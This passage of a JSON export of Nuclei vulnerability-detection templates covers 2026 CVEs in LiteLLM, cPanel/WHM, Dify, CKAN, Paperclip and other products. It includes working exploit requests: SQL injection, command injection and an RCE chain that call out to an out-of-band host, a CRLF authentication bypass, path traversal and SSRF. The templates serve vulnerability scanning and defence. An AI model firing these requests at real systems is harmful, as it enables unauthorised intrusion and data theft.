https://github.com/getarcaneapp/arcane/security/advisories/GHSA-cxx3-hr75-4q96\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42461\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-42461\n    epss-score: 0.01283\n    epss-percentile: 0.68799\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: getarcaneapp\n    product: arcane\n    shodan-query: html:\"/api/app-images\"\n    fofa-query: body=\"/api/app-images\"\n  tags: cve,cve2026,arcane,exposure\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"/api/app-images\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/templates/all HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"BaseApiResponseListTemplate\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: tid\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"id\"\\s*:\\s*\"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\"'\n\n  - raw:\n      - |\n        GET /api/templates/{{tid}}/content HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"envContent\")'\n        condition: and\n# digest: 490a00463044022026d5da7c6bbdd45ffc7510815102e941f066d57cd4e8f8729c798d12e657addb02207c2b89c3e858abe2ec19a19c275df746c4c2df556434837450ff59fc716f9077:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-42461.yaml","vuln_id":"cve-2026-42461"},{"raw":"id: CVE-2026-42281\n\ninfo:\n  name: MagicMirror <= 2.35.0 - Server-Side Request Forgery\n  author: aleff-github\n  severity: critical\n  description: |\n    An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (VAR_NAME), enabling exfiltration of server-side secrets.\n  impact: |\n    A remote unauthenticated attacker can force the MagicMirror server to request localhost, internal network, and cloud metadata endpoints. In affected configurations, the endpoint can return server-side responses to the attacker.\n  remediation: |\n    Upgrade MagicMirror to version 2.36.0 or later.\n  reference:\n    - https://github.com/advisories/GHSA-ph6f-2cvq-79hq\n    - https://github.com/MagicMirrorOrg/MagicMirror/security/advisories/GHSA-ph6f-2cvq-79hq\n    - https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0\n    - https://osv.dev/vulnerability/GHSA-ph6f-2cvq-79hq\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N\n    cvss-score: 9.2\n    cve-id: CVE-2026-42281\n    epss-score: 0.01623\n    epss-percentile: 0.75063\n    cwe-id: CWE-918\n  metadata:\n    max-request: 2\n    verified: true\n    product: magicmirror\n    vendor: magicmirrororg\n    shodan-query: 'http.title:\"MagicMirror\"'\n  tags: cve,cve2026,magicmirror,ssrf,unauth,oast,oob\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"MagicMirror\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cors?url=http://127.0.0.1:8080/version\"\n      - \"{{BaseURL}}/cors?url=http://{{interactsh-url}}/version\"\n\n    stop-at-first-match: true\n\n    matchers-condition: or\n    matchers:\n      - type: dsl\n        name: version\n        dsl:\n          - regex('^(?:[01]\\.[0-9]+\\.[0-9]+|2\\.(?:[0-9]|[12][0-9]|3[0-5])\\.[0-9]+)\\s*$', body)\n          - status_code == 200\n        condition: and\n\n      - type: dsl\n        name: dns\n        dsl:\n          - \"contains(interactsh_protocol,'dns')\"\n          - status_code == 200\n        condition: and\n# digest: 4a0a00473045022100a368843630130c0e80d14b019b2fe94ac861faf66f806ae131944cd09c6984400220227fa173bf4f9a292358743cced1655586f797393418674b34a8d029ab747724:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42281.yaml","vuln_id":"cve-2026-42281"},{"raw":"id: CVE-2026-42271\n\ninfo:\n  name: LiteLLM - Command Injection\n  author: ritikchaddha\n  severity: critical\n  description: |\n    A critical unauthenticated remote code execution vulnerability exists in LiteLLM due to improper input handling in the MCP stdio test endpoint. An attacker can send a specially crafted request to the `/mcp-rest/test/connection` endpoint with controlled parameters, resulting in arbitrary command execution on the server. When combined with an authentication bypass technique—such as the Starlette BadHost flaw (CVE-2026-48710)—an unauthenticated attacker can exploit the chain to execute commands as the server process. Exploitation allows an attacker to spawn processes with the privileges of the LiteLLM server, potentially leading to complete compromise of the host.\n  impact: |\n    Successful exploitation allows unauthenticated remote attackers to execute arbitrary commands on affected LiteLLM instances, potentially leading to full system compromise, lateral movement, data theft, and persistent access.\n  remediation: |\n    Upgrade LiteLLM to version 1.83.7 or later to remediate this vulnerability. If immediate patching is not possible, restrict access to the `/mcp-rest/test/connection` endpoint and ensure authentication verification is robust.\n  reference:\n    - https://horizon3.ai/attack-research/vulnerabilities/cve-2026-42271-chained-with-cve-2026-48710/\n    - https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g\n    - https://github.com/BerriAI/litellm/pull/25343\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42271\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-42271\n    epss-score: 0.83594\n    epss-percentile: 0.99672\n    cwe-id: CWE-77\n  metadata:\n    max-request: 1\n    vendor: berriai\n    product: litellm\n  tags: cve,cve2026,litellm,rce,command-injection,mcp,starlette,kev,vkev\n\nvariables:\n  payload: '{\"transport\":\"stdio\",\"command\":\"python\",\"args\":[\"-c\",\"import urllib.request;urllib.request.urlopen(''https://{{interactsh-url}}'')\"]}'\n\nhttp:\n  - raw:\n      - |\n        POST /mcp-rest/test/connection HTTP/1.1\n        Host: a/?x=\n        Content-Type: application/json\n        Content-Length: {{len(payload)}}\n\n        {{payload}}\n\n    unsafe: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Failed to connect to MCP server\"\n\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n    extractors:\n      - type: kval\n        kval:\n          - interactsh_ip\n# digest: 4a0a00473045022060e09644a32663780d3b55b7eb7cbb37000ef5158c3b271f6c15cee2fab2537c0221008afbe072d4d44264adcad72023e3ada85257b07df72209270d9fbcf06da490a1:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42271.yaml","vuln_id":"cve-2026-42271"},{"raw":"id: CVE-2026-42221\n\ninfo:\n  name: Nginx UI <= 2.3.7 - Unauthenticated Installer Exposure\n  author: str4k3r\n  severity: high\n  description: |\n    Nginx UI 2.0.0 to 2.3.8 contains an authentication bypass caused by unauthenticated access to /api/install during first-run setup, letting remote attackers claim the initial admin account, exploit requires attacker to access the service before legitimate operator.\n  impact: |\n    Remote attackers can permanently take over the initial administrator account, leading to full control of the instance.\n  remediation: |\n    Upgrade to version 2.3.8 or later.\n  reference:\n    - https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h27v-ph7w-m9fp\n    - https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42221\n  classification:\n    cve-id: CVE-2026-42221\n    epss-score: 0.01165\n    epss-percentile: 0.6592\n    cwe-id: CWE-306\n    cvss-score: 8.1\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: 0xjacky\n    product: nginx-ui\n    shodan-query: http.title:\"Nginx UI\"\n    fofa-query: app=\"Nginx-UI\"\n  tags: cve,cve2026,nginx-ui,unauth,takeover,cwe-306\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /api/install HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"lock\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: lock_state\n        group: 1\n        regex:\n          - '(\"lock\":\\s*(?:true|false)(?:,\\s*\"timeout\":\\s*(?:true|false))?)'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/install HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"encrypted_params\":\"aW52YWxpZA==\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains_all(body, \"decryption failed\", \"40001\")'\n        condition: and\n# digest: 4b0a00483046022100d40243195607fde966afe415ba9ec2683288a8db594d55a159aef900ef29cbb10221008d7ab3b0eeed17b556376ef3142dc8c003c510fad5ff201600cf933ecb193fea:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-42221.yaml","vuln_id":"cve-2026-42221"},{"raw":"id: CVE-2026-42208\n\ninfo:\n  name: LiteLLM - SQL Injection\n  author: HAERIN-L\n  severity: critical\n  description: |\n    LiteLLM 1.81.16 to < 1.83.7 contains a SQL injection caused by improper handling of caller-supplied key in database query during proxy API key checks, letting unauthenticated attackers read and modify database data, exploit requires crafted Authorization header.\n  impact: |\n    Unauthenticated attackers can read and modify proxy database, leading to unauthorized access and credential compromise.\n  remediation: |\n    Upgrade to version 1.83.7 or later.\n  reference:\n    - https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc\n    - https://www.sysdig.com/blog/cve-2026-42208-critical-sql-injection-litellm/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42208\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-42208\n    epss-score: 0.8942\n    epss-percentile: 0.99777\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: BerriAI\n    product: LiteLLM\n    shodan-query: http.title:\"LiteLLM\"\n  tags: cve,cve2026,litellm,sqli,unauthenticated,kev,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /ui/login/? HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        POST /v1/chat/completions HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer invalid_token_baseline_test\n\n        {}\n\n    redirects: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_1, \"litellm-asset-prefix\")'\n          - 'contains(content_type_2, \"application/json\")'\n          - 'status_code_2 == 401'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 30s\n        POST /v1/chat/completions HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{randstr}}' OR (SELECT pg_sleep(8)) IS NOT NULL --\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n          - 'duration >= 8'\n        condition: and\n# digest: 4a0a00473045022100fe35658e02a076ad55880c8fce17404b94c5548950fba041242bace601b39b6e022026b4a3a586ab3705fe4de87393b5c57803990fe58eff2da151bb0826332a2eba:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42208.yaml","vuln_id":"cve-2026-42208"},{"raw":"id: CVE-2026-42031\n\ninfo:\n  name: CKAN DataStore SQL Search - SQL Injection\n  author: theamanrawat\n  severity: high\n  description: |\n    CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.\n  impact: |\n    An unauthenticated attacker can read arbitrary data from the PostgreSQL database including system catalog tables, private DataStore resources, and potentially user credentials.\n  remediation: |\n    Upgrade CKAN to version 2.10.10 or 2.11.5 or later.\n  reference:\n    - https://github.com/advisories/GHSA-h7j7-3rx6-xvcg\n    - https://github.com/ckan/ckan/security/advisories/GHSA-h7j7-3rx6-xvcg\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-42031\n    epss-score: 0.01817\n    epss-percentile: 0.77756\n    cwe-id: CWE-89\n  metadata:\n    max-request: 2\n    verified: true\n    shodan-query: http.title:\"CKAN\"\n    fofa-query: title=\"CKAN\"\n  tags: cve,cve2026,ckan,sqli,datastore,unauth,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/action/status_show\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"ckan_version\"\n          - '\"success\": true'\n        condition: and\n        internal: true\n\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/action/datastore_search_sql?sql=SELECT+ts_rewrite('a'::tsquery,+'SELECT+''a''::tsquery,+(SELECT+current_database())::tsquery')\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - '\"success\": true'\n          - \"ts_rewrite\"\n          - \"records\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502201eb5049b9e651fc5f12cc17bcedbc2179ee7835807551436eb5d44c35edac465022100d1c3fb3fd1b25b2c2dadaa566a0eda8f56d59cd1189bf330cb1ccaf6b407c148:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-42031.yaml","vuln_id":"cve-2026-42031"},{"raw":"id: CVE-2026-42018\n\ninfo:\n  name: JFrog Artifactory - Anonymous Token Disclosure via Trailing Slash Auth Bypass\n  author: theamanrawat\n  severity: high\n  description: |\n    JFrog Artifactory contains an information disclosure caused by returning an internal anonymous-user token to unauthenticated callers when anonymous access is disabled, letting unauthenticated attackers access sensitive resources. The exploit requires anonymous access to be disabled.\n  impact: |\n    Unauthenticated attackers can access sensitive resources by obtaining internal tokens, potentially leading to information disclosure.\n  remediation: |\n    Update to the latest version where this issue is fixed.\n  reference:\n    - https://docs.jfrog.com/releases/docs/jfrog-security-advisories\n    - https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201\n    - https://github.com/BL0odz/JFrog_CVE-2026-65615-ByGLM\n    - https://edrabb.fr/posts/full-chain-preauth-rce-jfrog-artifactory/\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-42018\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-42018\n    epss-score: 0.11038\n    epss-percentile: 0.95711\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.title:\"jfrog\"\n    fofa-query: title=\"jfrog\"\n  tags: cve,cve2026,jfrog,artifactory,auth-bypass,disclosure,kev,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /access/api/v1/aws/token HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n        internal: true\n\n  - raw:\n      - |\n        POST /access/api/v1/aws/token/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"access_token\") && contains(body, \"anonymous\")'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: anonymous-jwt-token\n        part: body\n        regex:\n          - 'eyJ[A-Za-z0-9_-]+\\.[A-Za-z0-9_-]+\\.[A-Za-z0-9_-]+'\n# digest: 4b0a00483046022100becd02fb558229a30de8bcf98aea551e0f2c9ab6d1fe5613927e8c7076b5770f0221009dfd993dabfce5ac74e7300a524a640a757c3072a8a611bcd931ffea7bfdf014:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-42018.yaml","vuln_id":"cve-2026-42018"},{"raw":"id: CVE-2026-41948\n\ninfo:\n  name: Dify <=1.14.1 - Unauthenticated Plugin Daemon Path Traversal\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Dify version 1.14.1 and prior are affected by an unauthenticated path traversal in the Plugin Daemon icon proxy endpoint. The /console/api/workspaces/current/plugin/icon endpoint requires no authentication and passes the filename query parameter unsanitized into the internal Plugin Daemon REST API URL. Using ../ dot-sequence traversal an attacker escapes the authorized plugin/{tenant_id}/asset/ namespace and reaches arbitrary internal Plugin Daemon endpoints. The /health/check endpoint is always available and returns Plugin Daemon version, build time and pool status confirming exploitation.\n  impact: |\n    Unauthenticated attackers can traverse the Plugin Daemon's internal REST API, leaking system metadata (version hash, platform, pool capacity). Any internal Plugin Daemon endpoint is reachable, meaning any new endpoint becomes instantly exploitable from the public internet without credentials.\n  remediation: |\n    Upgrade to Dify 1.15.0 or later. The fix in api/core/plugin/impl/base.py (BasePluginClient._prepare_request) URL-decodes the path and raises ValueError on any segment containing .. or %2e%2e, preventing path traversal sequences from being forwarded to the Plugin Daemon.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41948\n    - https://www.zafran.io/resources/difytap-zafran-discovers-how-attackers-can-silently-wiretap-ai-data-across-tenants-on-a-platform-powering-1m-apps\n    - https://huntr.com/bounties/35b7ad59-e35d-443f-bf77-387bfb932ec0\n    - https://github.com/langgenius/dify/pull/35796\n    - https://osv.dev/vulnerability/CVE-2026-41948\n    - https://www.vulncheck.com/advisories/dify-path-traversal-via-plugin-daemon-internal-api-access\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n    cvss-score: 9.4\n    cve-id: CVE-2026-41948\n    epss-score: 0.14453\n    epss-percentile: 0.96467\n    cwe-id: CWE-23\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: langgenius\n    product: dify\n    shodan-query: title:\"Dify\"\n    fofa-query: icon_hash=\"97378986\"\n  tags: cve,cve2026,dify,langgenius,path-traversal,unauth,ssrf,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /signin HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"<title>Dify\") || contains(body, \"langgenius\") || contains(tolower(all_headers), \"x-dify\")'\n        condition: and\n\n  - raw:\n      - |\n        GET /console/api/workspaces/current/plugin/icon?tenant_id=00000000-0000-0000-0000-000000000000&filename=../../../health/check HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"pool_status\",\"\\\"status\\\"\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450221009a1e15cfb56826489d55458e8daa6b6c7ba488a27cc1c25a41ddb237f618ca8302206cf11228de3eab0451e105898c94066aaef37b7bfb0494b3071f07fc89601dd1:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41948.yaml","vuln_id":"cve-2026-41948"},{"raw":"id: CVE-2026-41940\n\ninfo:\n  name: cPanel & WHM - Authentication Bypass via Session-File CRLF Injection\n  author: watchtowr,hadrian.io,DhiyaneshDk\n  severity: critical\n  description: |\n    cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.\n  impact: |\n    Unauthenticated remote attackers can gain unauthorized access to the control panel, compromising system security.\n  remediation: |\n    Update to version 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5 or later.\n  reference:\n    - https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026\n    - https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/\n    - https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py\n    - https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41940\n  metadata:\n    verified: true\n    max-request: 4\n    shodan-query: title:\"WHM Login\"\n  tags: cve,cve2026,cpanel,whm,auth-bypass,crlf,vkev,kev\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        POST /login/?login_only=1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Connection: close\n\n        user=root&pass=wrong\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 401\n          - contains(header, \"whostmgrrelogin\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: session_no_ob\n        part: header\n        group: 1\n        regex:\n          - 'whostmgrsession=([^;,]+?)%2[Cc]'\n        internal: true\n\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: whostmgrsession={{session_no_ob}}\n        Authorization: Basic cm9vdDp4DQpoYXNyb290PTENCnRmYV92ZXJpZmllZD0xDQp1c2VyPXJvb3QNCmNwX3NlY3VyaXR5X3Rva2VuPS9jcHNlc3M5OTk5OTk5OTk5DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9MTc3NzQ2MjE0OQ0K\n        Connection: close\n\n    disable-cookie: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 307\n          - contains(location, \"cpsess\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: cp_token\n        part: header\n        regex:\n          - '(/cpsess\\d+)'\n        group: 1\n        internal: true\n\n  - raw:\n      - |\n        GET /scripts2/listaccts HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: whostmgrsession={{session_no_ob}}\n        Connection: close\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 401\n        internal: true\n\n  - raw:\n      - |\n        GET {{cp_token}}/json-api/version HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: whostmgrsession={{session_no_ob}}\n        Connection: close\n\n    disable-cookie: true\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        words:\n          - '\"data\":{\"version\":\"'\n          - '\"command\":\"version\"'\n          - '\"reason\":\"OK\"'\n          - '\"result\":1'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - \"Access denied\"\n        negative: true\n\n    extractors:\n      - type: regex\n        part: body\n        regex:\n          - '\"version\"\\s*:\\s*\"([^\"]+)\"'\n        group: 1\n# digest: 4a0a00473045022100f130f9f84ef8381e91bd1cbfe3783396f55c6e3230665d68a684941b497d814402200f6abc0ff1067d65c1eb80ac99a3ffefbdfc071dbeef4aff2985493c5d127ae9:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41940.yaml","vuln_id":"cve-2026-41940"},{"raw":"id: CVE-2026-41679\n\ninfo:\n  name: Paperclip - Remote Code Execution\n  author: theamanrawat,pdteam\n  severity: critical\n  description: |\n    Paperclip < 2026.416.0 contains a remote code execution caused by a chain of six unauthenticated API calls in authenticated mode with default configuration, letting unauthenticated attackers execute arbitrary code remotely, exploit requires network access to the target.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code remotely, leading to full system compromise.\n  remediation: |\n    Update to version 2026.416.0 or later.\n  reference:\n    - https://github.com/paperclipai/paperclip/security/advisories/GHSA-68qg-g8mg-6pr7\n    - https://attackerkb.com/topics/86rSV7hsXi/cve-2026-41679\n    - https://www.rapid7.com/db/modules/exploit/linux/http/paperclipai_unauth_rce_cve_2026_41679\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41679\n    - https://github.com/bartfroklage/cve-2026-41679\n  classification:\n    cve-id: CVE-2026-41679\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cwe-id: CWE-862,CWE-287,CWE-1188\n    epss-score: 0.18852\n    epss-percentile: 0.97161\n    cpe: cpe:2.3:a:paperclipai:paperclipai:*:*:*:*:*:node.js:*:*\n  metadata:\n    verified: true\n    max-request: 7\n    vendor: paperclipai\n    product: paperclipai\n    shodan-query: http.title:\"Paperclip\" port:3100\n    fofa-query: title=\"Paperclip\" && port=\"3100\"\n  tags: cve,cve2026,paperclip,paperclipai,rce,unauth,oast,intrusive,vuln,vkev\n\nvariables:\n  r_user: \"{{rand_text_alpha(8)}}\"\n  r_email: \"{{rand_text_alpha(8)}}@{{rand_text_alpha(5)}}.com\"\n  r_pass: \"{{rand_text_alphanumeric(16)}}\"\n  r_corp: \"{{rand_text_alpha(8)}}\"\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/health\"\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'deploymentMode')\"\n          - \"contains(body, 'status')\"\n        condition: and\n\n  - raw:\n      - |\n        POST /api/auth/sign-up/email HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Origin: {{RootURL}}\n\n        {\"email\":\"{{r_email}}\",\"password\":\"{{r_pass}}\",\"name\":\"{{r_user}}\"}\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'createdAt')\"\n        condition: and\n\n  - raw:\n      - |\n        POST /api/auth/sign-in/email HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Origin: {{RootURL}}\n\n        {\"email\":\"{{r_email}}\",\"password\":\"{{r_pass}}\"}\n\n    extractors:\n      - type: regex\n        name: session_cookie\n        internal: true\n        part: header\n        group: 1\n        regex:\n          - '(?i)set-cookie:\\s*([^;\\r\\n]*session[_-]token=[^;\\r\\n]+)'\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'token')\"\n        condition: and\n\n  - raw:\n      - |\n        POST /api/cli-auth/challenges HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Origin: {{RootURL}}\n\n        {\"command\":\"{{rand_text_alpha(6)}}\"}\n\n    extractors:\n      - type: json\n        name: challenge_id\n        internal: true\n        json:\n          - \".id\"\n      - type: json\n        name: challenge_token\n        internal: true\n        json:\n          - \".token\"\n      - type: json\n        name: board_api_token\n        internal: true\n        json:\n          - \".boardApiToken\"\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - \"status_code == 201\"\n          - \"contains(body, 'boardApiToken')\"\n        condition: and\n\n  - raw:\n      - |\n        POST /api/cli-auth/challenges/{{challenge_id}}/approve HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Origin: {{RootURL}}\n\n        {\"token\":\"{{challenge_token}}\"}\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - \"status_code == 200\"\n          - \"!contains(body, 'error')\"\n        condition: and\n\n  - raw:\n      - |\n        POST /api/companies/import HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{board_api_token}}\n        Origin: {{RootURL}}\n\n        {\"source\":{\"type\":\"inline\",\"files\":{\"COMPANY.md\":\"---\\nname: {{r_corp}}\\nslug: {{r_corp}}\\n---\\nx\",\"agents/pwn/AGENTS.md\":\"---\\nkind: agent\\nname: pwn\\nslug: pwn\\nrole: engineer\\n---\\nx\",\".paperclip.yaml\":\"agents:\\n  pwn:\\n    icon: terminal\\n    adapter:\\n      type: process\\n      config:\\n        command: bash\\n        args:\\n          - -c\\n          - nslookup {{interactsh-url}}\"}},\"target\":{\"mode\":\"new_company\",\"newCompanyName\":\"{{r_corp}}\"},\"include\":{\"company\":true,\"agents\":true},\"agents\":\"all\"}\n\n      - |\n        POST /api/agents/{{agent_id}}/wakeup HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{board_api_token}}\n        Origin: {{RootURL}}\n\n        {}\n\n    extractors:\n      - type: json\n        name: agent_id\n        internal: true\n        json:\n          - \".agents[0].id\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: dsl\n        dsl:\n          - \"status_code_1 == 200\"\n          - \"contains(body_1, 'agents')\"\n          - \"status_code_2 == 202\"\n        condition: and\n# digest: 